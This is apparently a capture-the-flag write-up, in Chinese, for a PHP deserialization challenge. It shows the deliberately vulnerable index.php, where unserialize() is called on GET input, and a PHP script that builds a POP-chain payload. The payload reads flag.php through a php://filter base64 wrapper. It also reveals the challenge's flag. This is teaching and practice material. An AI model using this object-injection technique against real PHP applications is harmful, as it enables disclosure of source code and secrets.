题目:
index.php You are in my range!<?phperror_reporting(0);class Vox{protected $headset;public $sound;public function fun($pulse){include($pulse);}public function __invoke(){$this->fun($this->headset);}}class Saw{public $fearless;public $gun;public function __construct($file='index.php'){$this->fearless = $file;echo $this->fearless . ' You are in my range!'."<br>";}public function __toString(){$this->gun['gun']->fearless;return "Saw";}public function _pain(){if($this->fearless){highlight_file($this->fearless);}}public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|php|\.\./i", $this->fearless)){echo "Does it hurt? That's right";$this->fearless = "index.php";}}}class Petal{public $seed;public function __construct(){$this->seed = array();}public function __get($sun){$Nourishment = $this->seed;return $Nourishment();}}if(isset($_GET['ozo'])){unserialize($_GET['ozo']);}else{$Saw = new Saw('index.php');$Saw->_pain();}?>
<?php
!defined('IN_FLAG') && exit('Access Denied');
echo "flag{un3eri@liz3_i3_s0_fun}";
?>
PAYLOAD:
<?php
class Vox{
protected $headset='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Saw{
public $fearless;
public $gun;
public function __construct($file='index.php'){
$this->fearless = $file;
echo $this->fearless . ' You are in my range!'."<br>";
}
public function __toString(){
return "";
}
public function __wakeup()
{
$this->fearless = new Saw();
}
}
class Petal{
public $seed;
public function __construct(){
$this->seed = New Vox();
}
}
$a = new Saw('flag.php');
$a->gun['gun'] = new Petal();
$b = new Saw($a);
$pop = serialize($b);
print_r($pop);
echo "</br>";
echo urlencode($pop);
?>
若有收获,就点个赞吧
0 人点赞
